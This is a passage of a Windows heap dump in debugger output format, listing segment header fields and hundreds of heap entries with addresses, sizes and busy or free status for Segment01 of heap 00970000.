[01] - busy (600) + 0097dbf0: 00608 . 00188 [01] - busy (180) + 0097dd78: 00188 . 00608 [01] - busy (600) + 0097e380: 00608 . 003d8 [01] - busy (3ce) + 0097e758: 003d8 . 003e8 [01] - busy (3dc) + 0097eb40: 003e8 . 003e8 [01] - busy (3dc) + 0097ef28: 003e8 . 003e8 [01] - busy (3dc) + 0097f310: 003e8 . 003e8 [01] - busy (3dc) + 0097f6f8: 003e8 . 00608 [01] - busy (600) + 0097fd00: 00608 . 000f8 [01] - busy (f0) + 0097fdf8: 000f8 . 00150 [01] - busy (148) + 0097ff48: 00150 . 00038 [01] - busy (30) + 0097ff80: 00038 . 00080 [11] - busy (78) + Segment01 at 00980000: + Flags: 00000000 + Base: 00980000 + First Entry: 00980040 + Last Entry: 00a80000 + Total Pages: 00000100 + Total UnCommit: 00000000 + Largest UnCommit:00000000 + UnCommitted Ranges: (0) + + Heap entries for Segment01 in Heap 00970000 + 00980000: 00000 . 00040 [01] - busy (40) + 00980040: 00040 . 40008 [01] - busy (40000) + 009c0048: 40008 . 00608 [01] - busy (600) + 009c0650: 00608 . 01808 [01] - busy (1800) + 009c1e58: 01808 . 00188 [01] - busy (180) + 009c1fe0: 00188 . 00020 [00] + 009c2000: 00020 . 00608 [01] - busy (600) + 009c2608: 00608 . 00608 [01] - busy (600) + 009c2c10: 00608 . 00608 [01] - busy (600) + 009c3218: 00608 . 01808 [01] - busy (1800) + 009c4a20: 01808 . 00160 [01] - busy (158) + 009c4b80: 00160 . 00188 [01] - busy (180) + 009c4d08: 00188 . 00160 [01] - busy (158) + 009c4e68: 00160 . 00188 [01] - busy (180) + 009c4ff0: 00188 . 00608 [01] - busy (600) + 009c55f8: 00608 . 01808 [01] - busy (1800) + 009c6e00: 01808 . 00608 [01] - busy (600) + 009c7408: 00608 . 00178 [01] - busy (16c) + 009c7580: 00178 . 00080 [00] + 009c7600: 00080 . 002e8 [01] - busy (2df) + 009c78e8: 002e8 . 00198 [01] - busy (18a) + 009c7a80: 00198 . 00220 [01] - busy (214) + 009c7ca0: 00220 . 00200 [01] - busy (1f8) + 009c7ea0: 00200 . 001d0 [01] - busy (1c1) + 009c8070: 001d0 . 00260 [01] - busy (257) + 009c82d0: 00260 . 001d8 [01] - busy (1cb) + 009c84a8: 001d8 . 00168 [01] - busy (160) + 009c8610: 00168 . 00188 [01] - busy (180) + 009c8798: 00188 . 001b0 [01] - busy (1a8) + 009c8948: 001b0 . 001a8 [01] - busy (19d) + 009c8af0: 001a8 . 000c8 [01] - busy (c0) + 009c8bb8: 000c8 . 00050 [01] - busy (48) + 009c8c08: 00050 . 00010 [01] - busy (4) + 009c8c18: 00010 . 00f88 [01] - busy (f7f) + 009c9ba0: 00f88 . 00090 [01] - busy (82) + 009c9c30: 00090 . 003f0 [01] - busy (3e8) + 009ca020: 003f0 . 00128 [01] - busy (120) + 009ca148: 00128 . 00120 [01] - busy (114) + 009ca268: 00120 . 00608 [01] - busy (600) + 009ca870: 00608 . 00148 [01] - busy (140) + 009ca9b8: 00148 . 00608 [01] - busy (600) + 009cafc0: 00608 . 000d0 [01] - busy (c8) + 009cb090: 000d0 . 00608 [01] - busy (600) + 009cb698: 00608 . 00250 [01] - busy (247) + 009cb8e8: 00250 . 00018 [01] - busy (10) + 009cb900: 00018 . 00018 [01] - busy (10) + 009cb918: 00018 . 00020 [01] - busy (18) + 009cb938: 00020 . 00018 [01] - busy (10) + 009cb950: 00018 . 00018 [01] - busy (10) + 009cb968: 00018 . 00010 [01] - busy (2) + 009cb978: 00010 . 00060 [00] + 009cb9d8: 00060 . 00608 [01] - busy (600) + 009cbfe0: 00608 . 00048 [01] - busy (3c) + 009cc028: 00048 . 00020 [01] - busy (18) + 009cc048: 00020 . 00018 [01] - busy (10) + 009cc060: 00018 . 00018 [01] - busy (10) + 009cc078: 00018 . 00188 [01] - busy (180) + 009cc200: 00188 . 00030 [01] - busy (24) + 009cc230: 00030 . 00018 [01] - busy (10) + 009cc248: 00018 . 00188 [01] - busy (180) + 009cc3d0: 00188 . 00030 [01] - busy (22) + 009cc400: 00030 . 00018 [01] - busy (10) + 009cc418: 00018 . 00028 [01] - busy (20) + 009cc440: 00028 . 00018 [01] - busy (10) + 009cc458: 00018 . 00188 [01] - busy (180) + 009cc5e0: 00188 . 00018 [01] - busy (10) + 009cc5f8: 00018 . 00018 [01] - busy (10) + 009cc610: 00018 . 00048 [01] - busy (40) + 009cc658: 00048 . 00018 [01] - busy (10) + 009cc670: 00018 . 00188 [01] - busy (180) + 009cc7f8: 00188 . 00018 [01] - busy (10) + 009cc810: 00018 . 00188 [01] - busy (180) + 009cc998: 00188 . 00018 [01] - busy (10) + 009cc9b0: 00018 . 00188 [01] - busy (180) + 009ccb38: 00188 . 00018 [01] - busy (c) + 009ccb50: 00018 . 00018 [01] - busy (10) + 009ccb68: 00018 . 00048 [01] - busy (40) + 009ccbb0: 00048 . 00130 [01] - busy (127) + 009ccce0: 00130 . 00188 [01] - busy (180) + 009cce68: 00188 . 00018 [01] - busy (10) + 009cce80: 00018 . 00188 [01] - busy (180) + 009cd008: 00188 . 00608 [01] - busy (600) + 009cd610: 00608 . 00608 [01] - busy (600) + 009cdc18: 00608 . 01808 [01] - busy (1800) + 009cf420: 01808 . 001f8 [01] - busy (1ef) + 009cf618: 001f8 . 00270 [01] - busy (264) + 009cf888: 00270 . 001e0 [01] - busy (1d8) + 009cfa68: 001e0 . 00188 [01] - busy (180) + 009cfbf0: 00188 . 000c8 [01] - busy (c0) + 009cfcb8: 000c8 . 00188 [01] - busy (180) + 009cfe40: 00188 . 005d8 [01] - busy (5ca) + 009d0418: 005d8 . 00080 [01] - busy (78) + 009d0498: 00080 . 00308 [01] - busy (300) + 009d07a0: 00308 . 00188 [01] - busy (180) + 009d0928: 00188 . 00018 [01] - busy (10) + 009d0940: 00018 . 00188 [01] - busy (180) + 009d0ac8: 00188 . 00020 [01] - busy (18) + 009d0ae8: 00020 . 00c10 [01] - busy (c00) + 009d16f8: 00c10 . 003e8 [01] - busy (3dc) + 009d1ae0: 003e8 . 00010 [01] - busy (4) + 009d1af0: 00010 . 00260 [01] - busy (255) + 009d1d50: 00260 . 000f0 [01] - busy (e8) + 009d1e40: 000f0 . 00158 [01] - busy (14f) + 009d1f98: 00158 . 00a60 [01] - busy (a51) + 009d29f8: 00a60 . 00168 [01] - busy (160) + 009d2b60: 00168 . 00178 [01] - busy (16f) + 009d2cd8: 00178 . 00258 [01] - busy (24d) + 009d2f30: 00258 . 00138 [01] - busy (12b) + 009d3068: 00138 . 00158 [01] - busy (150) + 009d31c0: 00158 . 00158 [01] - busy (14a) + 009d3318: 00158 . 00180 [01] - busy (178) + 009d3498: 00180 . 00138 [01] - busy (12b) + 009d35d0: 00138 . 00158 [01] - busy (14f) + 009d3728: 00158 . 00178 [01] - busy (16c) + 009d38a0: 00178 . 00180 [01] - busy (178) + 009d3a20: 00180 . 001f0 [01] - busy (1e4) + 009d3c10: 001f0 . 002c0 [01] - busy (2b4) + 009d3ed0: 002c0 . 00200 [01] - busy (1f8) + 009d40d0: 00200 . 001f8 [01] - busy (1f0) + 009d42c8: 001f8 . 01808 [01] - busy (1800) + 009d5ad0: 01808 . 00608 [01] - busy (600) + 009d60d8: 00608 . 00608 [01] - busy (600) + 009d66e0: 00608 . 000e8 [01] - busy (dc) + 009d67c8: 000e8 . 00018 [01] - busy (c) + 009d67e0: 00018 . 00030 [01] - busy (28) + 009d6810: 00030 . 00198 [01] - busy (18e) + 009d69a8: 00198 . 00970 [01] - busy (963) + 009d7318: 00970 . 000c0 [01] - busy (b8) + 009d73d8: 000c0 . 001d8 [01] - busy (1cf) + 009d75b0: 001d8 . 00128 [01] - busy (11d) + 009d76d8: 00128 . 00110 [01] - busy (104) + 009d77e8: 00110 . 00168 [01] - busy (15a) + 009d7950: 00168 . 00150 [01] - busy (141) + 009d7aa0: 00150 . 001b0 [01] - busy (1a4) + 009d7c50: 001b0 . 00198 [01] - busy (18d) + 009d7de8: 00198 . 00148 [01] - busy (140) + 009d7f30: 00148 . 003b0 [01] - busy (3a4) + 009d82e0: 003b0 . 00110 [01] - busy (105) + + 009d83f0: 00110 . 001c0 [01] - busy (1b1) + 009d85b0: 001c0 . 001d0 [01] - busy (1c7) + 009d8780: 001d0 . 00160 [00] + 009d88e0: 00160 . 00018 [01] - busy (c) + 009d88f8: 00018 . 00188 [01] - busy (180) + 009d8a80: 00188 . 00020 [01] - busy (18) + 009d8aa0: 00020 . 01808 [01] - busy (1800) + 009da2a8: 01808 . 00608 [01] - busy (600) + 009da8b0: 00608 . 001a8 [01] - busy (19a) + 009daa58: 001a8 . 00608 [01] - busy (600) + 009db060: 00608 . 00140 [01] - busy (133) + 009db1a0: 00140 . 00c08 [01] - busy (c00) + 009dbda8: 00c08 . 00158 [01] - busy (14d) + 009dbf00: 00158 . 00160 [01] - busy (155) + 009dc060: 00160 . 00368 [01] - busy (35e) + 009dc3c8: 00368 . 00140 [01] - busy (132) + 009dc508: 00140 . 01808 [01] - busy (1800) + 009ddd10: 01808 . 00170 [01] - busy (168) + 009dde80: 00170 . 00130 [01] - busy (124) + 009ddfb0: 00130 . 00018 [01] - busy (10) + 009ddfc8: 00018 . 00018 [01] - busy (4) + 009ddfe0: 00018 . 00188 [01] - busy (180) + 009de168: 00188 . 00188 [01] - busy (180) + 009de2f0: 00188 . 00188 [01] - busy (180) + 009de478: 00188 . 00608 [01] - busy (600) + 009dea80: 00608 . 00158 [01] - busy (150) + 009debd8: 00158 . 00020 [01] - busy (18) + 009debf8: 00020 . 00020 [01] - busy (14) + 009dec18: 00020 . 00018 [01] - busy (10) + 009dec30: 00018 . 00020 [01] - busy (18) + 009dec50: 00020 . 00018 [01] - busy (10) + 009dec68: 00018 . 00018 [01] - busy (10) + 009dec80: 00018 . 00018 [01] - busy (10) + 009dec98: 00018 . 00010 [01] - busy (4) + 009deca8: 00010 . 00070 [01] - busy (64) + 009ded18: 00070 . 00198 [01] - busy (18c) + 009deeb0: 00198 . 00020 [01] - busy (18) + 009deed0: 00020 . 000f0 [01] - busy (e8) + 009defc0: 000f0 . 00210 [01] - busy (202) + 009df1d0: 00210 . 00218 [01] - busy (20e) + 009df3e8: 00218 . 00238 [01] - busy (229) + 009df620: 00238 . 000d0 [01] - busy (c0) + 009df6f0: 000d0 . 004a0 [01] - busy (498) + 009dfb90: 004a0 . 00098 [01] - busy (90) + 009dfc28: 00098 . 00120 [01] - busy (117) + 009dfd48: 00120 . 001d0 [01] - busy (1c1) + 009dff18: 001d0 . 40008 [01] - busy (40000) + 00a1ff20: 40008 . 00330 [01] - busy (324) + 00a20250: 00330 . 00188 [01] - busy (180) + 00a203d8: 00188 . 00150 [01] - busy (145) + 00a20528: 00150 . 00190 [01] - busy (188) + 00a206b8: 00190 . 00188 [01] - busy (180) + 00a20840: 00188 . 00218 [01] - busy (210) + 00a20a58: 00218 . 00188 [01] - busy (180) + 00a20be0: 00188 . 00188 [01] - busy (180) + 00a20d68: 00188 . 00040 [01] - busy (38) + 00a20da8: 00040 . 00120 [01] - busy (117) + 00a20ec8: 00120 . 00020 [01] - busy (18) + 00a20ee8: 00020 . 000e8 [01] - busy (dc) + 00a20fd0: 000e8 . 00608 [01] - busy (600) + 00a215d8: 00608 . 00178 [01] - busy (170) + 00a21750: 00178 . 00270 [01] - busy (268) + 00a219c0: 00270 . 00078 [01] - busy (64) + 00a21a38: 00078 . 00190 [01] - busy (184) + 00a21bc8: 00190 . 00608 [01] - busy (600) + 00a221d0: 00608 . 00188 [01] - busy (180) + 00a22358: 00188 . 00188 [01] - busy (180) + 00a224e0: 00188 . 001e0 [01] - busy (1d8) + 00a226c0: 001e0 . 00188 [01] - busy (180) + 00a22848: 00188 . 00120 [01] - busy (117) + 00a22968: 00120 . 00028 [01] - busy (20) + 00a22990: 00028 . 00018 [01] - busy (c) + 00a229a8: 00018 . 00188 [01] - busy (180) + 00a22b30: 00188 . 00018 [01] - busy (10) + 00a22b48: 00018 . 00020 [01] - busy (14) + 00a22b68: 00020 . 00020 [01] - busy (14) + 00a22b88: 00020 . 00048 [01] - busy (40) + 00a22bd0: 00048 . 00288 [01] - busy (27b) + 00a22e58: 00288 . 00250 [01] - busy (244) + 00a230a8: 00250 . 00148 [01] - busy (140) + 00a231f0: 00148 . 001e0 [01] - busy (1d8) + 00a233d0: 001e0 . 00608 [01] - busy (600) + 00a239d8: 00608 . 00170 [01] - busy (164) + 00a23b48: 00170 . 001e0 [01] - busy (1d8) + 00a23d28: 001e0 . 00070 [01] - busy (62) + 00a23d98: 00070 . 00148 [01] - busy (13a) + 00a23ee0: 00148 . 000f0 [01] - busy (e8) + 00a23fd0: 000f0 . 001b0 [01] - busy (1a4) + 00a24180: 001b0 . 003a0 [01] - busy (397) + 00a24520: 003a0 . 001e0 [01] - busy (1d4) + 00a24700: 001e0 . 00200 [01] - busy (1f8) + 00a24900: 00200 . 00150 [01] - busy (146) + 00a24a50: 00150 . 00258 [01] - busy (250) + 00a24ca8: 00258 . 001e8 [01] - busy (1d9) + 00a24e90: 001e8 . 00258 [01] - busy (250) + 00a250e8: 00258 . 00158 [01] - busy (150) + 00a25240: 00158 . 001e0 [01] - busy (1d8) + 00a25420: 001e0 . 001e0 [01] - busy (1d8) + 00a25600: 001e0 . 00080 [01] - busy (78) + 00a25680: 00080 . 00070 [01] - busy (60) + 00a256f0: 00070 . 001e0 [01] - busy (1d8) + 00a258d0: 001e0 . 00608 [01] - busy (600) + 00a25ed8: 00608 . 00338 [01] - busy (330) + 00a26210: 00338 . 00188 [01] - busy (180) + 00a26398: 00188 . 00278 [01] - busy (26a) + 00a26610: 00278 . 001e0 [01] - busy (1d8) + 00a267f0: 001e0 . 00188 [01] - busy (180) + 00a26978: 00188 . 00178 [01] - busy (16c) + 00a26af0: 00178 . 002b8 [01] - busy (2ae) + 00a26da8: 002b8 . 00188 [01] - busy (180) + 00a26f30: 00188 . 001e0 [01] - busy (1d8) + 00a27110: 001e0 . 00188 [01] - busy (180) + 00a27298: 00188 . 00180 [01] - busy (174) + 00a27418: 00180 . 00178 [01] - busy (16c) + 00a27590: 00178 . 00168 [01] - busy (160) + 00a276f8: 00168 . 00178 [01] - busy (16c) + 00a27870: 00178 . 00170 [01] - busy (164) + 00a279e0: 00170 . 00180 [01] - busy (174) + 00a27b60: 00180 . 00168 [01] - busy (15c) + 00a27cc8: 00168 . 00168 [01] - busy (15c) + 00a27e30: 00168 . 00178 [01] - busy (16c) + 00a27fa8: 00178 . 00168 [01] - busy (160) + 00a28110: 00168 . 00118 [01] - busy (10c) + 00a28228: 00118 . 00130 [01] - busy (121) + 00a28358: 00130 . 001f8 [01] - busy (1eb) + 00a28550: 001f8 . 001c0 [01] - busy (1b2) + 00a28710: 001c0 . 00150 [01] - busy (144) + 00a28860: 00150 . 00188 [01] - busy (17d) + 00a289e8: 00188 . 00280 [01] - busy (278) + 00a28c68: 00280 . 002b0 [01] - busy (2a4) + 00a28f18: 002b0 . 00020 [01] - busy (18) + 00a28f38: 00020 . 000f0 [01] - busy (e8) + 00a29028: 000f0 . 001e0 [01] - busy (1d8) + 00a29208: 001e0 . 000c8 [01] - busy (c0) + 00a292d0: 000c8 . 00298 [01] - busy (290) + 00a29568: 00298 . 00178 [01] - busy (170) + 00a296e0: 00178 . 00608 [01] - busy (600) + 00a29ce8: 00608 . 001c0 [01] - busy (1b4) + 00a29ea8: 001c0 . 00110 [01] - busy (104) + 00a29fb8: 00110 . 00128 [01] - busy (11c) + 00a2a0e0: 00128 . 00140 [01] - busy (134) + 00a2a220: 00140 . 00020 [01] - busy (14) + 00a2a240: 00020 . 00608 [01] - busy (600) + 00a2a848: 00608 . 00170 [01] - busy (164) + 00a2a9b8: 00170 . 00138 [01] - busy (12c) + 00a2aaf0: 00138 . 00028 [01] - busy (20) + 00a2ab18: 00028 . 001e0 [01] - busy (1d8) + 00a2acf8: 001e0 . 00188 [01] - busy (180) + 00a2ae80: 00188 . 000c8 [01] - busy (c0) + 00a2af48: 000c8 . 00098 [00] + 00a2afe0: 00098 . 001e0 [01] - busy (1d8) + 00a2b1c0: 001e0 . 00188 [01] - busy (180) + 00a2b348: 00188 . 000c8 [01] - busy (c0) + 00a2b410: 000c8 . 00098 [01] - busy (8c) + 00a2b4a8: 00098 . 001e0 [01] - busy (1d8) + 00a2b688: 001e0 . 00188 [01] - busy (180) + 00a2b810: 00188 . 000c8 [01] - busy (c0) + 00a2b8d8: 000c8 . 00098 [01] - busy (88) + 00a2b970: 00098 . 001e0 [01] - busy (1d8) + 00a2bb50: 001e0 . 00188 [01] - busy (180) + 00a2bcd8: 00188 . 000c8 [01] - busy (c0) + 00a2bda0: 000c8 . 00098 [01] - busy (84) + 00a2be38: 00098 . 00188 [01] - busy (180) + 00a2bfc0: 00188 . 001e0 [01] - busy (1d8) + 00a2c1a0: 001e0 . 00308 [01] - busy (300) + 00a2c4a8: 00308 . 00178 [01] - busy (169) + 00a2c620: 00178 . 00168 [01] - busy (160) + 00a2c788: 00168 . 000c8 [01] - busy (c0) + 00a2c850: 000c8 . 00088 [01] - busy (80) + 00a2c8d8: 00088 . 00010 [01] - busy (4) + 00a2c8e8: 00010 . 001e0 [01] - busy (1d8) + 00a2cac8: 001e0 . 00188 [01] - busy (180) + 00a2cc50: 00188 . 00188 [01] - busy (180) + 00a2cdd8: 00188 . 00608 [01] - busy (600) + 00a2d3e0: 00608 . 001e0 [01] - busy (1d8) + 00a2d5c0: 001e0 . 00160 [01] - busy (158) + 00a2d720: 00160 . 00188 [01] - busy (180) + 00a2d8a8: 00188 . 001e0 [01] - busy (1d8) + 00a2da88: 001e0 . 00188 [01] - busy (180) + 00a2dc10: 00188 . 00160 [01] - busy (157) + 00a2dd70: 00160 . 001e0 [01] - busy (1d8) + 00a2df50: 001e0 . 00188 [01] - busy (180) + 00a2e0d8: 00188 . 00160 [01] - busy (158) + 00a2e238: 00160 . 001e0 [01] - busy (1d8) + 00a2e418: 001e0 . 00188 [01] - busy (180) + 00a2e5a0: 00188 . 00168 [01] - busy (15c) + 00a2e708: 00168 . 00188 [01] - busy (180) + 00a2e890: 00188 . 00178 [01] - busy (170) + 00a2ea08: 00178 . 00168 [01] - busy (160) + 00a2eb70: 00168 . 00188 [01] - busy (180) + 00a2ecf8: 00188 . 00608 [01] - busy (600) + 00a2f300: 00608 . 001b8 [01] - busy (1b0) + 00a2f4b8: 001b8 . 00168 [01] - busy (15c) + 00a2f620: 00168 . 00170 [01] - busy (164) + 00a2f790: 00170 . 00168 [01] - busy (15c) + 00a2f8f8: 00168 . 001d0 [01] - busy (1c7) + 00a2fac8: 001d0 . 00120 [01] - busy (113) + 00a2fbe8: 00120 . 00018 [01] - busy (10) + 00a2fc00: 00018 . 00268 [01] - busy (25c) + 00a2fe68: 00268 . 00128 [01] - busy (120) + 00a2ff90: 00128 . 00248 [01] - busy (240) + 00a301d8: 00248 . 00198 [01] - busy (18f) + 00a30370: 00198 . 00210 [01] - busy (204) + 00a30580: 00210 . 00048 [01] - busy (40) + 00a305c8: 00048 . 00350 [01] - busy (344) + 00a30918: 00350 . 00288 [01] - busy (27e) + 00a30ba0: 00288 . 00180 [01] - busy (176) + 00a30d20: 00180 . 00108 [01] - busy (100) + 00a30e28: 00108 . 00058 [01] - busy (48) + 00a30e80: 00058 . 00160 [01] - busy (158) + 00a30fe0: 00160 . 00030 [01] - busy (24) + 00a31010: 00030 . 00160 [01] - busy (158) + 00a31170: 00160 . 001e0 [01] - busy (1d8) + 00a31350: 001e0 . 00188 [01] - busy (180) + 00a314d8: 00188 . 001e0 [01] - busy (1d8) + 00a316b8: 001e0 . 00160 [01] - busy (154) + 00a31818: 00160 . 001e0 [01] - busy (1d8) + 00a319f8: 001e0 . 00188 [01] - busy (180) + 00a31b80: 00188 . 00160 [01] - busy (158) + 00a31ce0: 00160 . 001e0 [01] - busy (1d8) + 00a31ec0: 001e0 . 00608 [01] - busy (600) + 00a324c8: 00608 . 00190 [01] - busy (188) + 00a32658: 00190 . 00608 [01] - busy (600) + 00a32c60: 00608 . 00608 [01] - busy (600) + 00a33268: 00608 . 001e0 [01] - busy (1d8) + 00a33448: 001e0 . 001e0 [01] - busy (1d8) + 00a33628: 001e0 . 00170 [01] - busy (164) + 00a33798: 00170 . 00170 [01] - busy (164) + 00a33908: 00170 . 00170 [01] - busy (168) + 00a33a78: 00170 . 00170 [01] - busy (168) + 00a33be8: 00170 . 00168 [01] - busy (160) + 00a33d50: 00168 . 00170 [01] - busy (164) + 00a33ec0: 00170 . 00178 [01] - busy (16c) + 00a34038: 00178 . 00188 [01] - busy (180) + 00a341c0: 00188 . 00188 [01] - busy (180) + 00a34348: 00188 . 00188 [01] - busy (180) + 00a344d0: 00188 . 00188 [01] - busy (180) + 00a34658: 00188 . 00170 [01] - busy (164) + 00a347c8: 00170 . 00170 [01] - busy (168) + 00a34938: 00170 . 00168 [01] - busy (15c) + 00a34aa0: 00168 . 00170 [01] - busy (168) + 00a34c10: 00170 . 00160 [01] - busy (158) + 00a34d70: 00160 . 00260 [01] - busy (251) + 00a34fd0: 00260 . 00b60 [01] - busy (b53) + 00a35b30: 00b60 . 003b8 [01] - busy (3ad) + 00a35ee8: 003b8 . 000c8 [01] - busy (c0) + 00a35fb0: 000c8 . 00198 [01] - busy (190) + 00a36148: 00198 . 001f8 [01] - busy (1ec) + 00a36340: 001f8 . 00168 [01] - busy (160) + 00a364a8: 00168 . 00170 [01] - busy (168) + 00a36618: 00170 . 001d0 [01] - busy (1c4) + 00a367e8: 001d0 . 00198 [01] - busy (190) + 00a36980: 00198 . 001b8 [01] - busy (1b0) + 00a36b38: 001b8 . 00168 [01] - busy (15c) + 00a36ca0: 00168 . 00178 [01] - busy (16c) + 00a36e18: 00178 . 00170 [01] - busy (164) + 00a36f88: 00170 . 00180 [01] - busy (174) + 00a37108: 00180 . 00178 [01] - busy (170) + 00a37280: 00178 . 00180 [01] - busy (178) + 00a37400: 00180 . 00178 [01] - busy (16c) + 00a37578: 00178 . 00170 [01] - busy (164) + 00a376e8: 00170 . 00168 [01] - busy (15c) + 00a37850: 00168 . 00188 [01] - busy (17c) + 00a379d8: 00188 . 00170 [01] - busy (164) + 00a37b48: 00170 . 00190 [01] - busy (184) + 00a37cd8: 00190 . 00160 [01] - busy (158) + 00a37e38: 00160 . 003a0 [01] - busy (398) + 00a381d8: 003a0 . 002b0 [01] - busy (2a4) + 00a38488: 002b0 . 002a8 [01] - busy (29c) + 00a38730: 002a8 . 002a8 [01] - busy (29c) + 00a389d8: 002a8 . 00248 [01] - busy (23c) + 00a38c20: 00248 . 00248 [01] - busy (23c) + 00a38e68: 00248 . 00138 [01] - busy (12c) + 00a38fa0: 00138 . 00048 [01] - busy (3a) + 00a38fe8: 00048 . 00018 [00] + 00a39000: 00018 . 00178 [01] - busy (16f) + 00a39178: 00178 . 00188 [01] - busy (180) + 00a39300: 00188 . 00110 [01] - busy (108) + 00a39410: 00110 . 00188 [01] - busy (180) + 00a39598: 00188 . 00138 [01] - busy (12d) + 00a396d0: 00138 . 00180 [01] - busy (174) + 00a39850: 00180 . 00010 [01] - busy (4) + 00a39860: 00010 . 00010 [01] - busy (4) + 00a39870: 00010 . 00168 [01] - busy (15c) + 00a399d8: 00168 . 18008 [01] - busy (18000) + 00a519e0: 18008 . 002c0 [01] - busy (2b4) + 00a51ca0: 002c0 . 00368 [01] - busy (35d) + 00a52008: 00368 . 00198 [01] - busy (18e) + 00a521a0: 00198 . 00330 [01] - busy (324) + 00a524d0: 00330 . 00488 [01] - busy (47c) + 00a52958: 00488 . 003c8 [01] - busy (3c0) + 00a52d20: 003c8 . 00608 [01] - busy (600) + 00a53328: 00608 . 001d8 [01] - busy (1c9) + 00a53500: 001d8 . 00188 [01] - busy (180) + 00a53688: 00188 . 001e0 [01] - busy (1d8) + 00a53868: 001e0 . 00108 [01] - busy (100) + 00a53970: 00108 . 00108 [01] - busy (100) + 00a53a78: 00108 . 00108 [01] - busy (100) + 00a53b80: 00108 . 00160 [01] - busy (158) + 00a53ce0: 00160 . 00190 [01] - busy (180) + 00a53e70: 00190 . 00178 [01] - busy (16c) + 00a53fe8: 00178 . 00188 [01] - busy (180) + 00a54170: 00188 . 00180 [01] - busy (174) + 00a542f0: 00180 . 00028 [01] - busy (20) + 00a54318: 00028 . 00018 [01] - busy (10) + 00a54330: 00018 . 01300 [01] - busy (12f7) + 00a55630: 01300 . 00818 [01] - busy (809) + 00a55e48: 00818 . 001b0 [01] - busy (1a8) + 00a55ff8: 001b0 . 00288 [01] - busy (27b) + 00a56280: 00288 . 00488 [01] - busy (47e) + 00a56708: 00488 . 00188 [01] - busy (180) + 00a56890: 00188 . 00188 [01] - busy (180) + 00a56a18: 00188 . 00188 [01] - busy (180) + 00a56ba0: 00188 . 00188 [01] - busy (180) + 00a56d28: 00188 . 00188 [01] - busy (17c) + 00a56eb0: 00188 . 00128 [01] - busy (120) + 00a56fd8: 00128 . 00010 [01] - busy (8) + 00a56fe8: 00010 . 001b8 [01] - busy (1b0) + 00a571a0: 001b8 . 00188 [01] - busy (180) + 00a57328: 00188 . 00188 [01] - busy (180) + 00a574b0: 00188 . 00608 [01] - busy (600) + 00a57ab8: 00608 . 00170 [01] - busy (161) + 00a57c28: 00170 . 001e0 [01] - busy (1d8) + 00a57e08: 001e0 . 00188 [01] - busy (180) + 00a57f90: 00188 . 00048 [01] - busy (40) + 00a57fd8: 00048 . 00018 [00] + 00a57ff0: 00018 . 003e8 [01] - busy (3dc) + 00a583d8: 003e8 . 00188 [01] - busy (17c) + 00a58560: 00188 . 00450 [01] - busy (441) + 00a589b0: 00450 . 000c8 [01] - busy (c0) + 00a58a78: 000c8 . 00010 [01] - busy (8) + 00a58a88: 00010 . 00010 [01] - busy (4) + 00a58a98: 00010 . 003e8 [01] - busy (3dc) + 00a58e80: 003e8 . 00120 [01] - busy (114) + 00a58fa0: 00120 . 00010 [01] - busy (8) + 00a58fb0: 00010 . 00040 [00] + 00a58ff0: 00040 . 00170 [01] - busy (164) + 00a59160: 00170 . 00288 [01] - busy (280) + 00a593e8: 00288 . 00188 [01] - busy (180) + 00a59570: 00188 . 00168 [01] - busy (15c) + 00a596d8: 00168 . 00170 [01] - busy (164) + 00a59848: 00170 . 001e0 [01] - busy (1d8) + 00a59a28: 001e0 . 00050 [01] - busy (40) + 00a59a78: 00050 . 00190 [01] - busy (188) + 00a59c08: 00190 . 00190 [01] - busy (185) + 00a59d98: 00190 . 00178 [01] - busy (16c) + 00a59f10: 00178 . 00170 [01] - busy (168) + 00a5a080: 00170 . 00160 [01] - busy (154) + 00a5a1e0: 00160 . 00178 [01] - busy (170) + 00a5a358: 00178 . 003e8 [01] - busy (3dc) + 00a5a740: 003e8 . 001d0 [01] - busy (1c7) + 00a5a910: 001d0 . 00160 [01] - busy (157) + 00a5aa70: 00160 . 001b0 [01] - busy (1a8) + 00a5ac20: 001b0 . 00188 [01] - busy (17e) + 00a5ada8: 00188 . 00210 [01] - busy (202) + 00a5afb8: 00210 . 00050 [01] - busy (40) + 00a5b008: 00050 . 00240 [01] - busy (238) + 00a5b248: 00240 . 002a8 [01] - busy (29c) + 00a5b4f0: 002a8 . 00248 [01] - busy (23c) + 00a5b738: 00248 . 00278 [01] - busy (270) + 00a5b9b0: 00278 . 002a8 [01] - busy (29c) + 00a5bc58: 002a8 . 00278 [01] - busy (270) + 00a5bed0: 00278 . 00248 [01] - busy (23c) + 00a5c118: 00248 . 00278 [01] - busy (270) + 00a5c390: 00278 . 00278 [01] - busy (270) + 00a5c608: 00278 . 00248 [01] - busy (23c) + 00a5c850: 00248 . 00248 [01] - busy (23c) + 00a5ca98: 00248 . 00248 [01] - busy (23c) + 00a5cce0: 00248 . 00248 [01] - busy (23c) + 00a5cf28: 00248 . 00248 [01] - busy (23c) + 00a5d170: 00248 . 00248 [01] - busy (23c) + 00a5d3b8: 00248 . 001a0 [01] - busy (194) + 00a5d558: 001a0 . 00248 [01] - busy (23c) + 00a5d7a0: 00248 . 00248 [01] - busy (23c) + 00a5d9e8: 00248 . 00248 [01] - busy (23c) + 00a5dc30: 00248 . 00248 [01] - busy (23c) + 00a5de78: 00248 . 00248 [01] - busy (23c) + 00a5e0c0: 00248 . 00248 [01] - busy (23c) + 00a5e308: 00248 . 00248 [01] - busy (23c) + 00a5e550: 00248 . 00248 [01] - busy (23c) + 00a5e798: 00248 . 00248 [01] - busy (23c) + 00a5e9e0: 00248 . 00248 [01] - busy (23c) + 00a5ec28: 00248 . 002a8 [01] - busy (29c) + 00a5eed0: 002a8 . 002a8 [01] - busy (29c) + 00a5f178: 002a8 . 00248 [01] - busy (23c) + 00a5f3c0: 00248 . 002a8 [01] - busy (29c) + 00a5f668: 002a8 . 002a8 [01] - busy (29c) + 00a5f910: 002a8 . 00248 [01] - busy (23c) + 00a5fb58: 00248 . 00248 [01] - busy (23c) + 00a5fda0: 00248 . 002a8 [01] - busy (29c) + 00a60048: 002a8 . 002a8 [01] - busy (29c) + 00a602f0: 002a8 . 002a8 [01] - busy (29c) + 00a60598: 002a8 . 002a8 [01] - busy (29c) + 00a60840: 002a8 . 002a8 [01] - busy (29c) + 00a60ae8: 002a8 . 002a8 [01] - busy (29c) + 00a60d90: 002a8 . 00248 [01] - busy (23c) + 00a60fd8: 00248 . 002a8 [01] - busy (29c) + 00a61280: 002a8 . 00248 [01] - busy (23c) + 00a614c8: 00248 . 00248 [01] - busy (23c) + 00a61710: 00248 . 00248 [01] - busy (23c) + 00a61958: 00248 . 00248 [01] - busy (23c) + 00a61ba0: 00248 . 002a8 [01] - busy (29c) + 00a61e48: 002a8 . 00280 [01] - 